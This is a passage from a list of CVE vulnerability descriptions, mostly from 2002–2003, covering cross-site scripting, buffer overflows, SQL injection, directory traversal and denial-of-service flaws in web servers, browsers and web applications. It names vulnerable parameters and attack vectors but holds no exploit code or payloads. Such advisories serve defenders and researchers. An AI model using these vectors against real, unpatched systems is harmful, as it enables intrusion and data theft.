scripting (XSS) vulnerability in the ICQ Web Front guestbook (guestbook.html) allows remote attackers to insert arbitrary web script and HTML via the message field. [CVE-2003-0762] Buffer overflow in (1) foxweb.dll and (2) foxweb.exe of Foxweb 2.5 allows remote attackers to execute arbitrary code via a long URL (PATH_INFO value). [CVE-2003-0757] Check Point FireWall-1 4.0 and 4.1 before SP5 allows remote attackers to obtain the IP addresses of internal interfaces via certain SecuRemote requests to TCP ports 256 or 264, which leaks the IP addresses in a reply packet. [CVE-2003-0749] Cross-site scripting (XSS) vulnerability in wgate.dll for SAP Internet Transaction Server (ITS) 4620.2.0.323011 allows remote attackers to insert arbitrary web script and steal cookies via the ~service parameter. [CVE-2003-0738] The calendar module in phpWebSite 0.9.x and earlier allows remote attackers to cause a denial of service (crash) via a long year parameter. [CVE-2003-0737] The calendar module in phpWebSite 0.9.x and earlier allows remote attackers to obtain the full pathname of phpWebSite via an invalid year, which generates an error from localtime() in TimeZone.php of the Pear library. [CVE-2003-0736] Multiple cross-site scripting (XSS) vulnerabilities in phpWebSite 0.9.x and earlier allow remote attackers to execute arbitrary web script via (1) the day parameter in the calendar module, (2) the fatcat_id parameter in the fatcat module, (3) the PAGE_id parameter in the pagemaster module, (4) the PDA_limit parameter in the search, and (5) possibly other parameters in the calendar, fatcat, and pagemaster modules. [CVE-2003-0735] SQL injection vulnerability in the Calendar module of phpWebSite 0.9.x and earlier allows remote attackers to execute arbitrary SQL queries, as demonstrated using the year parameter. [CVE-2003-0733] Multiple cross-site scripting (XSS) vulnerabilities in WebLogic Integration 7.0 and 2.0, Liquid Data 1.1, and WebLogic Server and Express 5.1 through 7.0, allow remote attackers to execute arbitrary web script and steal authentication credentials via (1) a forward instruction to the Servlet container or (2) other vulnerabilities in the WebLogic Server console application. [CVE-2003-0728] Horde before 2.2.4 allows remote malicious web sites to steal session IDs and read or create arbitrary email by stealing the ID from a referrer URL. [CVE-2003-0718] The WebDAV Message Handler for Internet Information Services (IIS) 5.0, 5.1, and 6.0 allows remote attackers to cause a denial of service (memory and CPU exhaustion, application crash) via a PROPFIND request with an XML message containing XML elements with a large number of attributes. [CVE-2003-0715] Heap-based buffer overflow in the Distributed Component Object Model (DCOM) interface in the RPCSS Service allows remote attackers to execute arbitrary code via a malformed DCERPC DCOM object activation request packet with modified length fields, a different vulnerability than CVE-2003-0352 (Blaster/Nachi) and CVE-2003-0528. [CVE-2003-0712] Cross-site scripting (XSS) vulnerability in the HTML encoding for the Compose New Message form in Microsoft Exchange Server 5.5 Outlook Web Access (OWA) allows remote attackers to execute arbitrary web script. [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules. [CVE-2003-0640] BEA WebLogic Server and Express, when using NodeManager to start servers, provides Operator users with privileges to overwrite usernames and passwords, which may allow Operators to gain Admin privileges. [CVE-2003-0636] Novell iChain 2.2 before Support Pack 1 does not properly verify that URL redirects match the DNS name of an accelerator, which allows attackers to redirect URLs to malicious web sites. [CVE-2003-0632] Buffer overflow in the Oracle Applications Web Report Review (FNDWRR) CGI program (FNDWRR.exe) of Oracle E-Business Suite 11.0 and 11.5.1 through 11.5.8 may allow remote attackers to execute arbitrary code via a long URL. [CVE-2003-0629] Cross-site scripting (XSS) vulnerability in PeopleSoft IScript environment for PeopleTools 8.43 and earlier allows remote attackers to insert arbitrary web script via a certain HTTP request to IScript. [CVE-2003-0624] Cross-site scripting (XSS) vulnerability in InteractiveQuery.jsp for BEA WebLogic 8.1 and earlier allows remote attackers to inject malicious web script via the person parameter. [CVE-2003-0623] Cross-site scripting (XSS) vulnerability in the Administration Console for BEA Tuxedo 8.1 and earlier allows remote attackers to inject arbitrary web script via the INIFILE argument. [CVE-2003-0621] The Administration Console for BEA Tuxedo 8.1 and earlier allows remote attackers to determine the existence of files outside the web root via modified paths in the INIFILE argument. [CVE-2003-0615] Cross-site scripting (XSS) vulnerability in start_form() of CGI.pm allows remote attackers to insert web script via a URL that is fed into the form's action parameter. [CVE-2003-0614] Cross-site scripting (XSS) vulnerability in search.php of Gallery 1.1 through 1.3.4 allows remote attackers to insert arbitrary web script via the searchstring parameter. [CVE-2003-0605] The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function. [CVE-2003-0602] Multiple cross-site scripting vulnerabilities (XSS) in Bugzilla 2.16.x before 2.16.3 and 2.17.x before 2.17.4 allow remote attackers to insert arbitrary HTML or web script via (1) multiple default German and Russian HTML templates or (2) ALT and NAME attributes in AREA tags as used by the GraphViz graph generation feature for local dependency graphs. [CVE-2003-0599] Unknown vulnerability in the Virtual File System (VFS) capability for phpGroupWare 0.9.16preRC and versions before 0.9.14.004 with unknown implications, related to the VFS path being under the web document root. [CVE-2003-0594] Mozilla allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Mozilla to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application. [CVE-2003-0593] Opera allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Opera to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application. [CVE-2003-0592] Konqueror in KDE 3.1.3 and earlier (kdelibs) allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Konqueror to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application. [CVE-2003-0590] Cross-site scripting (XSS) vulnerability in Splatt Forum allows remote attackers to insert arbitrary HTML and web script via the post icon (image_subject) field. [CVE-2003-0587] Cross-site scripting (XSS) vulnerability in Infopop Ultimate Bulletin Board (UBB) 6.x allows remote authenticated users to execute arbitrary web script and gain administrative access via the "displayed name" attribute of the "ubber" cookie. [CVE-2003-0567] Cisco IOS 11.x and 12.0 through 12.2 allows remote attackers to cause a denial of service (traffic block) by sending a particular sequence of IPv4 packets to an interface on the device, causing the input queue on that interface to be marked as full. [CVE-2003-0559] mainfile.php in phpforum 2 RC-1, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code by modifying the MAIN_PATH parameter to reference a URL on a remote web server that contains the code. [CVE-2003-0532] Internet Explorer 5.01 SP3 through 6.0 SP1 does not properly determine object types that are returned by web servers, which could allow remote attackers to execute arbitrary code via an object tag with a data parameter to a malicious file hosted on a server that returns an unsafe Content-Type, aka the "Object Type" vulnerability. [CVE-2003-0528] Heap-based buffer overflow in the Distributed Component Object Model (DCOM) interface in the RPCSS Service allows remote attackers to execute arbitrary code via a malformed RPC request with a long filename parameter, a different vulnerability than CVE-2003-0352 (Blaster/Nachi) and CVE-2003-0715. [CVE-2003-0526] Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found." [CVE-2003-0523] Cross-site scripting (XSS) vulnerability in msg.asp for certain versions of ProductCart allow remote attackers to execute arbitrary web script via the message parameter. [CVE-2003-0514] Apple Safari allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Safari to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application. [CVE-2003-0513] Microsoft Internet Explorer allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Internet Explorer to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application. [CVE-2003-0511] The web server for Cisco Aironet AP1x00 Series Wireless devices running certain versions of IOS 12.2 allow remote attackers to cause a denial of service (reload) via a malformed URL. [CVE-2003-0504] Multiple cross-site scripting (XSS) vulnerabilities in Phpgroupware 0.9.14.003 (aka webdistro) allow remote attackers to insert arbitrary HTML or web script, as demonstrated with a request to index.php in the addressbook module. [CVE-2003-0495] Cross-site scripting (XSS) vulnerability in LedNews 0.7 allows remote attackers to insert arbitrary web script via a news item. [CVE-2003-0492] Cross-site scripting (XSS) vulnerability in search.asp for Snitz Forums 3.4.03 and earlier allows remote attackers to execute arbitrary web script via the Search parameter. [CVE-2003-0488] Multiple cross-site scripting (XSS) vulnerabilities in Kerio MailServer 5.6.3 allow remote attackers to insert arbitrary web script via (1) the add_name parameter in the add_acl module, or (2) the alias parameter in the do_map module. [CVE-2003-0484] Cross-site scripting (XSS) vulnerability in viewtopic.php for phpBB allows remote attackers to insert arbitrary web script via the topic_id parameter. [CVE-2003-0481] Multiple cross-site scripting (XSS) vulnerabilities in TUTOS 1.1 allow remote attackers to insert arbitrary web script, as demonstrated using the msg parameter to file_select.php. [CVE-2003-0479] Cross-site scripting (XSS) vulnerability in the guestbook for WebBBS allows remote attackers to insert arbitrary web script via the (1) Name, (2) Email, or (3) Message fields. [CVE-2003-0475] Directory traversal vulnerability in iWeb Server 2 allows remote attackers to read arbitrary files via an HTTP request containing URL-encoded .. sequences ("%5c%2e%2e"), a different vulnerability than CVE-2003-0474. [CVE-2003-0474] Directory traversal vulnerability in iWeb Server allows remote attackers to read arbitrary files via an HTTP request containing .. sequences, a different vulnerability than CVE-2003-0475. [CVE-2003-0471] Buffer overflow in WebAdmin.exe for WebAdmin allows remote attackers to execute arbitrary code via an HTTP request to WebAdmin.dll with a long USER argument. [CVE-2003-0459] KDE Konqueror for KDE 3.1.2 and earlier does not remove authentication credentials from URLs of the "user:password@host" form in the HTTP-Referer header, which could allow remote web sites to steal the credentials for pages that link to the sites. [CVE-2003-0456] VisNetic WebSite 3.5 allows remote attackers to obtain the full pathname of the server via a request containing a folder that does not exist, which leaks the pathname in an error message, as demonstrated using _vti_bin/fpcount.exe. [CVE-2003-0446] Cross-site scripting (XSS) in Internet Explorer 5.5 and 6.0, possibly in a component that is also used by other Microsoft products, allows remote attackers to insert arbitrary web script via an XML file that contains a parse error, which inserts the script in the resulting error message. [CVE-2003-0445] Buffer overflow in webfs before 1.17.1 allows remote attackers to execute arbitrary code via an HTTP request with a long Request-URI. [CVE-2003-0438] eldav WebDAV client for Emacs, version 0.7.2 and earlier, allows local users to create or overwrite arbitrary files via a symlink attack on temporary files. [CVE-2003-0419] SMC Networks Barricade Wireless Cable/DSL Broadband Router SMC7004VWBR allows remote attackers to cause a denial of service via certain packets to PPTP port 1723 on the internal interface. [CVE-2003-0413] Cross-site scripting (XSS) vulnerability in the webapps-simple sample application for (1) Sun ONE Application Server 7.0 for Windows 2000/XP or (2) Sun Java System Web Server 6.1 allows remote attackers to insert arbitrary web script or HTML via an HTTP request that generates an "Invalid JSP file" error, which inserts the text in the resulting error message. [CVE-2003-0409] Buffer overflow in BRS WebWeaver 1.04 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP (1) POST or (2) HEAD request. [CVE-2003-0394] objects.inc.php4 in BLNews 2.1.3 allows remote attackers to execute arbitrary PHP code via a Server[path] parameter that points to malicious code on an attacker-controlled web site. [CVE-2003-0389] Cross-site scripting (XSS) vulnerability in the secure redirect function of RSA ACE/Agent 5.0 for Windows, and 5.x for Web, allows remote attackers to insert arbitrary web script and possibly cause users to enter a passphrase via a GET request containing the script. [CVE-2003-0381] Multiple vulnerabilities in noweb 2.9 and earlier creates temporary files insecurely, which allows local users to overwrite arbitrary files via multiple vectors including the noroff script. [CVE-2003-0375] Cross-site scripting (XSS) vulnerability in member.php of XMBforum XMB 1.8.x (aka Partagium) allows remote attackers to insert arbitrary HTML and web script via the "member" parameter. [CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms. [CVE-2003-0344] Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page. [CVE-2003-0318] Cross-site scripting (XSS) vulnerability in the Statistics module for PHP-Nuke 6.0 and earlier allows remote attackers to insert arbitrary web script via the year parameter. [CVE-2003-0315] Snowblind Web Server 1.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP request, which may trigger a buffer overflow. [CVE-2003-0314] Snowblind Web Server 1.0 allows remote attackers to cause a denial of service (crash) via a URL that ends in a "</" sequence. [CVE-2003-0313] Directory traversal vulnerability in Snowblind Web Server 1.0 allows remote attackers to list arbitrary directory contents via a ... (triple dot) in an HTTP request. [CVE-2003-0312] Directory traversal vulnerability in Snowblind Web Server 1.0 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP request. [CVE-2003-0310] Cross-site scripting (XSS) vulnerability in articleview.php for eZ publish 2.2 allows remote attackers to insert arbitrary web script. [CVE-2003-0309] Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to bypass security zone restrictions and execute arbitrary programs via a web document with a large number of duplicate file:// or other requests that point to the program and open multiple file download dialogs, which eventually cause Internet Explorer to execute the program, as demonstrated using a large number of FRAME or IFRAME tags, aka the "File Download Dialog Vulnerability." [CVE-2003-0295] Cross-site scripting (XSS) vulnerability in private.php for vBulletin 3.0.0 Beta 2 allows remote attackers to inject arbitrary web script and HTML via the "Preview Message" capability. [CVE-2003-0292] Cross-site scripting (XSS) vulnerability in Inktomi Traffic-Server 5.5.1 allows remote attackers to insert arbitrary web script or HTML into an error page that appears to come from the domain that the client is visiting, aka "Man-in-the-Middle" XSS. [CVE-2003-0287] Cross-site scripting (XSS) vulnerability in Movable Type before 2.6, and possibly other versions including 2.63, allows remote attackers to insert arbitrary web script or HTML via the Name textbox, possibly when the "Allow HTML in comments?" option is enabled. [CVE-2003-0283] Cross-site scripting (XSS) vulnerability in Phorum before 3.4.3 allows remote attackers to inject arbitrary web script and HTML tags via a message with a "<<" before a tag name in the (1) subject, (2) author's name, or (3) author's e-mail. [CVE-2003-0279] Multiple SQL injection vulnerabilities in the Web_Links module for PHP-Nuke 5.x through 6.5 allows remote attackers to steal sensitive information via numeric fields, as demonstrated using (1) the viewlink function and cid parameter, or (2) index.php. [CVE-2003-0278] Cross-site scripting (XSS) vulnerability in normal_html.cgi in Happycgi.com Happymall 4.3 and 4.4 allows remote attackers to insert arbitrary web script via the file parameter. [CVE-2003-0276] Buffer overflow in Pi3Web 2.0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a GET request with a large number of / characters. [CVE-2003-0275] SSI.php in YaBB SE 1.5.2 allows remote attackers to execute arbitrary PHP code by modifying the sourcedir parameter to reference a URL on a remote web server that contains the code. [CVE-2003-0268] SLWebMail 3 on Windows systems allows remote attackers to identify the full path of the server via invalid requests to DLLs such as WebMailReq.dll, which reveals the path in an error message. [CVE-2003-0267] ShowGodLog.dll in SLWebMail 3 on Windows systems allows remote attackers to read arbitrary files by directly calling ShowGodLog.dll with an argument specifying the full path of the target file. [CVE-2003-0266] Multiple buffer overflows in SLWebMail 3 on Windows systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long Language parameter to showlogin.dll, (2) a long CompanyID parameter to recman.dll, (3) a long CompanyID parameter to admin.dll, or (4) a long CompanyID parameter to globallogin.dll. [CVE-2003-0240] The web-based administration capability for various Axis Network Camera products allows remote attackers to bypass access restrictions and modify configuration via an HTTP request to the admin/admin.shtml containing a leading // (double slash). [CVE-2003-0226] Microsoft Internet Information Services (IIS) 5.0 and 5.1 allows remote attackers to cause a denial of service via a long WebDAV request with a (1) PROPFIND or (2) SEARCH method, which generates an error condition that is not properly handled. [CVE-2003-0224] Buffer overflow in ssinc.dll for Microsoft Internet Information Services (IIS) 5.0 allows local users to execute arbitrary code via a web page with a Server Side Include (SSI) directive with a long filename, aka "Server Side Include Web Pages Buffer Overrun." [CVE-2003-0217] Cross-site scripting (XSS) vulnerability in Neoteris Instant Virtual Extranet (IVE) 3.01 and earlier allows remote attackers to insert arbitrary web script and bypass authentication via a certain CGI script. [CVE-2003-0181] Lotus Domino Web Server (nhttp.exe) before 6.0.1 allows remote attackers to cause a denial of service via a "Fictionary Value Field POST request" as demonstrated using the s_Validation form with a long, unknown parameter name. [CVE-2003-0180] Lotus Domino Web Server (nhttp.exe) before 6.0.1 allows remote attackers to cause a denial of service via an incomplete POST request, as demonstrated using the h_PageUI form. [CVE-2003-0178] Multiple buffer overflows in Lotus Domino Web Server before 6.0.1 allow remote attackers to cause a denial of service or execute arbitrary code via (1) the s_ViewName option in the PresetFields parameter for iNotes, (2) the Foldername option in the PresetFields parameter for iNotes, or (3) a long Host header, which is inserted into a long Location header and used during a redirect operation. [CVE-2003-0169] hpnst.exe in the GoAhead-Webs webserver for HP Instant TopTools before 5.55 allows remote attackers to cause a denial of service (CPU consumption) via a request to hpnst.exe that calls itself, which causes an infinite loop. [CVE-2003-0160] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail before 1.2.11 allow remote attackers to inject arbitrary HTML code and steal information from a client's web browser. [CVE-2003-0154] Cross-site scripting vulnerabilities (XSS) in bonsai Mozilla CVS query tool allow remote attackers to execute arbitrary web script via (1) the file, root, or rev parameters to cvslog.cgi, (2) the file or root parameters to cvsblame.cgi, (3) various parameters to cvsquery.cgi, (4) the person parameter to showcheckins.cgi, (5) the module parameter to cvsqueryform.cgi, and (6) possibly other attack vectors as identified by Mozilla bug #146244. [CVE-2003-0151] BEA WebLogic Server and Express 6.0 through 7.0 does not properly restrict access to certain internal servlets that perform administrative functions, which allows remote attackers to read arbitrary files or execute arbitrary code. [CVE-2003-0123] Buffer overflow in Web Retriever client for Lotus Notes/Domino R4.5 through R6 allows remote malicious web servers to cause a denial of service (crash) via a long HTTP status line. [CVE-2003-0118] SQL injection vulnerability in the Document Tracking and Administration (DTA) website of Microsoft BizTalk Server 2000 and 2002 allows remote attackers to execute operating system commands via a request to (1) rawdocdata.asp or (2) RawCustomSearchField.asp containing an embedded SQL statement. [CVE-2003-0116] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check the Cascading Style Sheet input parameter for Modal dialogs, which allows remote attackers to read files on the local system via a web page containing script that creates a dialog and then accesses the target files, aka "Modal Dialog script execution." [CVE-2003-0115] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check parameters that are passed during third party rendering, which could allow remote attackers to execute arbitrary web script, aka the "Third Party Plugin Rendering" vulnerability, a different vulnerability than CVE-2003-0233. [CVE-2003-0114] The file upload control in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to automatically upload files from the local system via a web page containing a script to upload the files. [CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. [CVE-2003-0105] ServerMask 2.2 and earlier does not obfuscate (1) ETag, (2) HTTP Status Message, or (3) Allow HTTP responses, which could tell remote attackers that the web server is an IIS server. [CVE-2003-0101] miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000 does not properly handle metacharacters such as line feeds and carriage returns (CRLF) in Base-64 encoded strings during Basic authentication, which allows remote attackers to spoof a session ID and gain root privileges. [CVE-2003-0044] Multiple cross-site scripting (XSS) vulnerabilities in the (1) examples and (2) ROOT web applications for Jakarta Tomcat 3.x through 3.3.1a allow remote attackers to insert arbitrary web script or HTML. [CVE-2003-0043] Jakarta Tomcat before 3.3.1a, when used with JDK 1.3.1 or earlier, uses trusted privileges when processing the web.xml file, which could allow remote attackers to read portions of some files through the web.xml file. [CVE-2003-0038] Cross-site scripting (XSS) vulnerability in options.py for Mailman 2.1 allows remote attackers to inject script or HTML into web pages via the (1) email or (2) language parameters. [CVE-2003-0019] uml_net in the kernel-utils package for Red Hat Linux 8.0 has incorrect setuid root privileges, which allows local users to modify network interfaces, e.g. by modifying ARP entries or placing interfaces into promiscuous mode. [CVE-2003-0010] Integer overflow in JsArrayFunctionHeapSort function used by Windows Script Engine for JScript (JScript.dll) on various Windows operating system allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail that uses a large array index value that enables a heap-based buffer overflow attack. [CVE-2003-0001] Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak. [CVE-2002-2437] The JavaScript implementation in Mozilla Firefox before 4.0, Thunderbird before 3.3, and SeaMonkey before 2.1 does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method. [CVE-2002-2436] The Cascading Style Sheets (CSS) implementation in Mozilla Firefox before 4.0, Thunderbird before 3.3, and SeaMonkey before 2.1 does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264. [CVE-2002-2435] The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264. [CVE-2002-2431] Unspecified vulnerability in GoAhead WebServer before 2.1.4 allows remote attackers to cause "incorrect behavior" via unknown "malicious code," related to incorrect use of the socketInputBuffered function by sockGen.c. [CVE-2002-2430] GoAhead WebServer before 2.1.1 allows remote attackers to cause a denial of service (CPU consumption) by performing a socket disconnect to terminate a request before it has been fully processed by the server. [CVE-2002-2429] webs.c in GoAhead WebServer before 2.1.4 allows remote attackers to cause a denial of service (daemon crash) via an HTTP POST request that contains a negative integer in the Content-Length header. [CVE-2002-2428] webs.c in GoAhead WebServer before 2.1.4 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an HTTP POST request that contains a Content-Length header but no body data. [CVE-2002-2427] The security handler in GoAhead WebServer before 2.1.1 allows remote attackers to bypass authentication and obtain access to protected web content via "an extra slash in a URL," a different vulnerability than CVE-2002-1603. [CVE-2002-2424] Cross-site scripting (XSS) vulnerability in PHP(Reactor) 1.2.7 pl1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the style attribute of an HTML tag. [CVE-2002-2422] Cross-site scripting (XSS) vulnerability in Compaq Insight Management Agents 2.0, 2.1, 3.6.0, 4.2 and 4.3.7 allows remote attackers to inject arbitrary web script or HTML via a URL, which inserts the script into the resulting error message. [CVE-2002-2421] acWEB 1.14 allows remote attackers to cause a denial of service (crash) via an HTTP request for a MS-DOS device name such as COM2. [CVE-2002-2418] Cross-site scripting (XSS) vulnerability in acFreeProxy (aka acFP) 1.33 beta 7 allows remote attackers to inject arbitrary web script or HTML via the URL, which is inserted into an error page. [CVE-2002-2416] Directory traversal vulnerability in Zeroo web server 1.5 allows remote attackers to read arbitrary files via a .. (dot dot) in a URL GET request. [CVE-2002-2415] Allied Telesyn AT-8024 1.3.1 and Rapier 24 switches allow remote authenticated users to cause a denial of service in the management interface via a stream of zero (null) bytes sent via UDP to a running service. [CVE-2002-2413] WebSite Pro 3.1.11.0 on Windows allows remote attackers to read script source code for files with extensions greater than 3 characters via a URL request that uses the equivalent 8.3 file name. [CVE-2002-2410] openwebmail.pl in Open WebMail 1.7 and 1.71 reveals sensitive information in error messages and generates different responses whether a user exists or not, which allows remote attackers to identify valid usernames via brute force attacks and obtain certain configuration and version information. [CVE-2002-2403] Directory traversal vulnerability in KeyFocus web server 1.0.8 allows remote attackers to read arbitrary files for recognized MIME type files via "...", "....", ".....", and other multiple dot sequences. [CVE-2002-2391] SQL injection vulnerability in index.php of WebChat 1.5 included in XOOPS 1.0 allows remote attackers to execute arbitrary SQL commands via the roomid parameter. [CVE-2002-2389] TheServer 1.74 web server stores server.ini under the web document root with insufficient access control, which allows remote attackers to obtain cleartext passwords and gain access to server log files. [CVE-2002-2388] Buffer overflow in INweb POP3 mail server 2.01 allows remote attackers to cause a denial of service (crash) via a long HELO command. [CVE-2002-2386] Cross-site scripting (XSS) vulnerability in the Quizz module for XOOPS 1.0, when allowing on-line question development, allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in the SRC attribute of an IMG tag. [CVE-2002-2378] Cross-site scripting (XSS) vulnerability in AN HTTP 1.41d allows remote attackers to inject arbitrary web script or HTML via a colon (:) in the query string, which is inserted into the resulting error page. [CVE-2002-2377] Cross-site scripting (XSS) vulnerability in addentry.cgi in ZAP 1.0.3 allows remote attackers to inject arbitrary SSi directives, web script, and HTML via the entry field. [CVE-2002-2376] Cross-site scripting (XSS) vulnerability in E-Guest_sign.pl in E-Guest 1.1 allows remote attackers to inject arbitrary SSI directives, web script, and HTML via the (1) full name, (2) email, (3) homepage, and (4) location parameters. NOTE: this issue might overlap CVE-2005-1605. [CVE-2002-2375] Directory traversal vulnerability in CommuniGate Pro 4.0b4 and possibly earlier versions allows remote attackers to list the contents of the WebUser directory and its parent directory via a (1) .. (dot dot) or (2) . (dot) in a URL. NOTE: it is not clear whether this issue reveals any more information regarding directory structure than is already available to any CommuniGate Pro user, although there is a possibility that it could be used to infer product version information. [CVE-2002-2370] SWS web server 0.0.4, 0.0.3 and 0.1.0 allows remote attackers to cause a denial of service (crash) via a URL request that does not end with a newline. [CVE-2002-2364] Cross-site scripting (XSS) vulnerability in PHP Ticket 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a help ticket. [CVE-2002-2362] Cross-site scripting (XSS) vulnerability in form_header.php in MyMarket 1.71 allows remote attackers to inject arbitrary web script or HTML via the noticemsg parameter. [CVE-2002-2360] The RPC module in Webmin 0.21 through 0.99, when installed without root or admin privileges, allows remote attackers to read and write to arbitrary files and execute arbitrary commands via remote_foreign_require and remote_foreign_call requests. [CVE-2002-2359] Cross-site scripting (XSS) vulnerability in the FTP view feature in Mozilla 1.0 allows remote attackers to inject arbitrary web script or HTML via the title tag of an ftp URL. [CVE-2002-2358] Cross-site scripting (XSS) vulnerability in the FTP view feature in Opera 6.0 and 6.01 through 6.04 allows remote attackers to inject arbitrary web script or HTML via the title tag of an FTP URL. [CVE-2002-2350] Cross-site scripting (XSS) vulnerability in z_user_show.php in dbtreelistproperty_method.php in Zorum 2.4 allows remote attackers to inject arbitrary web script or HTML via the class parameter. [CVE-2002-2348] Cross-site scripting (XSS) vulnerability in athcgi.exe in Authoria HR allows remote attackers to inject arbitrary web script or HTML via the command parameter. [CVE-2002-2347] Cross-site scripting (XSS) vulnerability in Oracle Java Server Page (OJSP) demo files (1) hellouser.jsp, (2) welcomeuser.jsp and (3) usebean.jsp in Oracle 9i Application Server 9.0.2, 1.0.2.2, 1.0.2.1s and 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the text entry field. [CVE-2002-2344] Ensim WEBppliance 3.0 and 3.1 allows remote attackers to read mail intended for other users by defining an alias that is the target's email address. [CVE-2002-2343] Cross-site scripting (XSS) vulnerability in NOCC 0.9 through 0.9.5 allows remote attackers to inject arbitrary web script or HTML via email messages. [CVE-2002-2342] Bannermatic 1, 2, and 3 stores the (1) ban.log, (2) ban.bak, (3) ban.dat and (4) banmat.pwd data files under the web document root with insufficient access control, which allows attackers to obtain sensitive information via a direct request for the files. [CVE-2002-2341] Cross-site scripting (XSS) vulnerability in content blocking in SonicWALL SOHO3 6.3.0.0 allows remote attackers to inject arbitrary web script or HTML via a blocked URL. [CVE-2002-2340] Cross-site scripting (XSS) vulnerability in read.php in Phorum 3.3.2a allows remote attackers to inject arbitrary web script or HTML via (1) the t parameter or (2) the body of an email response. [CVE-2002-2339] Cross-site scripting (XSS) vulnerability in configure.asp in Script-Shed GuestBook 1.0 allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in (1) image, (2) img, (3) image=right, (4) img=right, (5) image=left, and (6) img=left tags. [CVE-2002-2335] Killer Protection 1.0 stores the vars.inc include file under the web root with insufficient access control, which allows remote attackers to obtain user names and passwords and log in using protection.php. [CVE-2002-2330] Cross-site scripting (XSS) vulnerability in stat.pl in StatsPlus 1.25 allows remote attackers to inject arbitrary web script or HTML via (1) HTTP_USER_AGENT or (2) HTTP_REFERER, which is written to stats.html and executed in client browsers. [CVE-2002-2322] Ultimate PHP Board (UPB) 1.0b stores the users.dat data file under the web root with insufficient access control, which allows remote attackers to obtain usernames and passwords. [CVE-2002-2321] Cross-site scripting (XSS) vulnerability in (1) showcat.php and (2) addyoursite.php in phpLinkat 0.1.0 allows remote attackers to inject arbitrary web script or HTML via the catid parameter. [CVE-2002-2318] Cross-site scripting (XSS) vulnerability in Falcon web server 2.0.0.1009 through 2.0.0.1021 allows remote attackers to inject arbitrary web script or HTML via the URI, which is inserted into 301 error messages and executed by 404 error messages. [CVE-2002-2312] Opera 6.0.1 allows remote attackers to upload arbitrary file contents when users press a key corresponding to the JavaScript (1) event.ctrlKey or (2) event.shiftKey onkeydown event contained in a webpage. [CVE-2002-2311] Microsoft Internet Explorer 6.0 and possibly others allows remote attackers to upload arbitrary file contents when users press a key corresponding to the JavaScript (1) event.ctrlKey or (2) event.shiftKey onkeydown event contained in a webpage. NOTE: it was reported that the vendor has disputed the severity of this issue. [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords. [CVE-2002-2308] Netscape Communicator 6.2.1 allows remote attackers to cause a denial of service in client browsers via a webpage containing a recursive META refresh tag where the content tag is blank and the URL tag references itself. [CVE-2002-2296] Cross-site scripting (XSS) vulnerability in YaBB.pl in Yet Another Bulletin Board (YaBB) 1 Gold SP 1 allows remote 